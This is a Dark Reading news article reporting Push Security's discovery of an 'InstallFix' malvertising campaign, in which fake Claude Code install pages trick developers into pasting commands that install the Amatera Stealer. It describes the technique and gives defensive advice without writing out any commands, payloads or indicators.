'InstallFix' Attacks Spread Fake Claude Code Sites

СLOUD SECURITY APPLICATION SECURITY CYBER RISK VULNERABILITIES & THREATS NEWS 'InstallFix' Attacks Spread Fake Claude Code Sites A fresh cyberattack campaign blends malvertising with a ClickFix-style technique that highlights risky behavior with AI coding assistants and command-line interfaces. Rob Wright,Senior News Director,Dark Reading March 9, 2026 4 Min Read SOURCE: RALF LIEBHOLD VIA ALAMY STOCK PHOTO A new variation of the ClickFix technique is capitalizing on the popularity of Anthropic's Claude Code and other AI coding tools. Researchers at Push Security discovered the threat campaign, which combines malvertising with a social engineering attack. The research team found fake install pages for Claude Code were spreading exclusively through Google-sponsored links for searches such as "Claude Code," "Claude Code install," and "Claude Code CLI." The cloned installation pages for Anthropic's coding assistant are near-identical to the real thing, Jacques Louw, Push Security co-founder and chief product officer (CPO), explained in a blog post published Friday. But when victims copy the malicious install commands from the clones sites, they deploy the Amatera Stealer malware, which could swipe developers' credentials and give attackers access to enterprise development environments. While there's nothing revolutionary about this approach, which Push Security calls "InstallFix," Louw explained that attackers have recognized the increased tendency among users to simply copy and paste commands into their systems and execute them. The attacks highlight an insecure practice that has, unfortunately, become the norm these days. Related:Most Google Cloud Attacks Start With Bug Exploitation "There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you'd only try once before some grizzled senior engineer beat it out of you," Louw wrote. "That's because you're effectively handing a website a blank cheque to execute whatever it wants on your system." ClickFix & CLI Tools Make a Dangerous Match  ClickFix is a widely used social engineering technique that typically delivers error messages of some kind to convince unsuspecting users to execute malicious commands. The error messages typically feature fake browser updates, but variations of the technique have used everything from phony Blue Screens of Death to audio errors for fake job interviews conducted over videoconferencing. InstallFix, however, might be the most apt variant yet because it targets a class of user that's probably comfortable with copying and pasting commands. Like many AI coding assistants, Louw explained, Anthropic's recommended install method for Claude Code is pasting and executing a one-line command in a system terminal. And it's not just AI-coding assistants; Louw wrote that hundreds of the most popular developer and command-line interface (CLI) tools ship with the same installation instructions. Attackers know that this has become a standard practice and are now exploiting it. Related:VMware Aria Operations Bug Exploited, Cloud Resources at Risk "The entire security model boils down to "trust the domain." And with AI adoption encouraging more non-technical users to work with the kind of tools that only devs used to use, this suddenly becomes a threat to a much larger, less security conscious pool of users," Louw wrote. Capitalizing on Claude Code According to Push Security, malicious Google ads are an ideal delivery mechanism because, unlike phishing emails, the malicious links won't be caught by email security scans. Plus, the attackers are taking advantage of the increasing interest in Claude Code with the sponsored search results, which appear above organic search results and could fool users who quickly click on a link without realizing it's an ad. While the InstallFix campaign may seem like it's tailored to take advantage of shadow AI adoption and inexperienced coders, Louw tells Dark Reading that's not necessarily the case. The threat actors behind the campaign are targeting a mainstream AI tool that are likely in use already in many organizations, and the risky path a user takes to install the tool, he says. The scheme can affect both experienced developers and amateur vibe-coders. "I suspect this campaign is targeting Claude Code specifically, because it's one of the tools (if not the tool) being adopted the fastest across the board," he says. "This is mirrored by the high rate of new account creations we see across our customers for Anthropic products." Related:AI Agent Overload: How to Solve the Workload Identity Crisis Push Security warned that in addition to abusing Google's sponsored links, the threat actors behind the InstallFix attacks are using domains from legitimate providers such as Cloudflare Pages, Tencent EdgeOne, and Squarespace, which appear innocuous and blend in with normal traffic activity. Louw said such abuse has been a common theme that Push Security has observed across virtually every phishing site and malicious link these days. Users should be extremely cautious when copying and pasting commands into their terminals and should take additional time to verify that the domains providing such commands are in fact authentic. While Push Security provided indicators of compromise (IoCs) for the InstallFix attacks, Louw said the data has limited value because domains for campaigns like this one tend to have a short lifespan. "This is a fast-moving situation, with domains constantly being spun up," he wrote. About the Author Rob Wright Senior News Director, Dark Reading Rob Wright is a longtime reporter with more than 25 years of experience as a technology journalist. Prior to joining Dark Reading as senior news director, he spent more than a decade at TechTarget's SearchSecurity in various roles, including senior news director, executive editor and editorial director. Before that, he worked for several years at CRN, Tom's Hardware Guide, and VARBusiness Magazine covering a variety of technology beats and trends. Prior to becoming a technology journalist in 2000, he worked as a weekly and daily newspaper reporter in Virginia, where he won three Virginia Press Association awards in 1998 and 1999. He graduated from the University of Richmond in 1997 with a degree in journalism and English. A native of Massachusetts, he lives in the Boston area.  More Insights Industry Reports Frost Radar™: Non-human Identity Solutions 2026 CISO AI Risk Report Cybersecurity Forecast 2026 The ROI of AI in Security ThreatLabz 2025 Ransomware Report Access More Research Webinars Building a Robust SOC in a Post-AI World Retail Security: Protecting Customer Data and Payment Systems Rethinking SSE: When Unified SASE Delivers the Flexibility Enterprises Need Securing Remote and Hybrid Work Forecast: Beyond the VPN AI-Powered Threat Detection: Beyond Traditional Security Models More Webinars You May Also Like СLOUD SECURITY Fake AI Chrome Extensions Steal 900K Users' Data by Alexander Culafi JAN 08, 2026 СLOUD SECURITY Critical 'MongoBleed' Bug Under Attack, Patch Now by Jai Vijayan, Contributing Writer JAN 05, 2026 СLOUD SECURITY Silk Typhoon Attacks North American Orgs in the Cloud by Nate Nelson, Contributing Writer AUG 22, 2025 CYBERATTACKS & DATA BREACHES DeepSeek Breach Opens Floodgates to Dark Web by Emma Zaballos APR 22, 2025 Editor's Choice CYBERSECURITY OPERATIONS Why Stryker's Outage Is a Disaster Recovery Wake-Up Call byJai Vijayan MAR 12, 2026 5 MIN READ APPLICATION SECURITY Microsoft Patches 83 CVEs in March Update byJai Vijayan MAR 11, 2026 4 MIN READ THREAT INTELLIGENCE Commercial Spyware Opponents Fear US Policy Shifting byRob Wright MAR 12, 2026 9 MIN READ Want more Dark Reading stories in your Google search results? 2026 Security Trends & Outlooks THREAT INTELLIGENCE Cybersecurity Predictions for 2026: Navigating the Future of Digital Threats JAN 2, 2026 CYBER RISK Navigating Privacy and Cybersecurity Laws in 2026 Will Prove Difficult JAN 12, 2026 ENDPOINT SECURITY CISOs Face a Tighter Insurance Market in 2026 JAN 5, 2026 THREAT INTELLIGENCE 2026: The Year Agentic AI Becomes the Attack-Surface Poster Child JAN 30, 2026 Download the Collection Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox. SUBSCRIBE Webinars Building a Robust SOC in a Post-AI World THURS, MARCH 19, 2026 AT 1PM EST Retail Security: Protecting Customer Data and Payment Systems THURS, APRIL 2, 2026 AT 1PM EST Rethinking SSE: When Unified SASE Delivers the Flexibility Enterprises Need WED, APRIL 1, 2026 AT 1PM EST Securing Remote and Hybrid Work Forecast: Beyond the VPN TUES, MARCH 10, 2026 AT 1PM EST AI-Powered Threat Detection: Beyond Traditional Security Models WED, MARCH 25, 2026 AT 1PM EST More Webinars White Papers Autonomous Pentesting at Machine Speed, Without False Positives Fixing Organizations' Identity Security Posture Best practices for incident response planning Industry Report: AI, SOC, and Modernizing Cybersecurity The Threat Prevention Buyer's Guide: Find the best AI-driven threat protection solution to stop file-based attacks. Explore More White Papers GISEC GLOBAL 2026 GISEC GLOBAL is the most influential and the largest cybersecurity gathering in the Middle East & Africa, uniting global CISOs, government leaders, technology buyers, and ethical hackers for three power-packed days of innovation, strategy, and live cyber drills. 📌 BOOK YOUR SPACE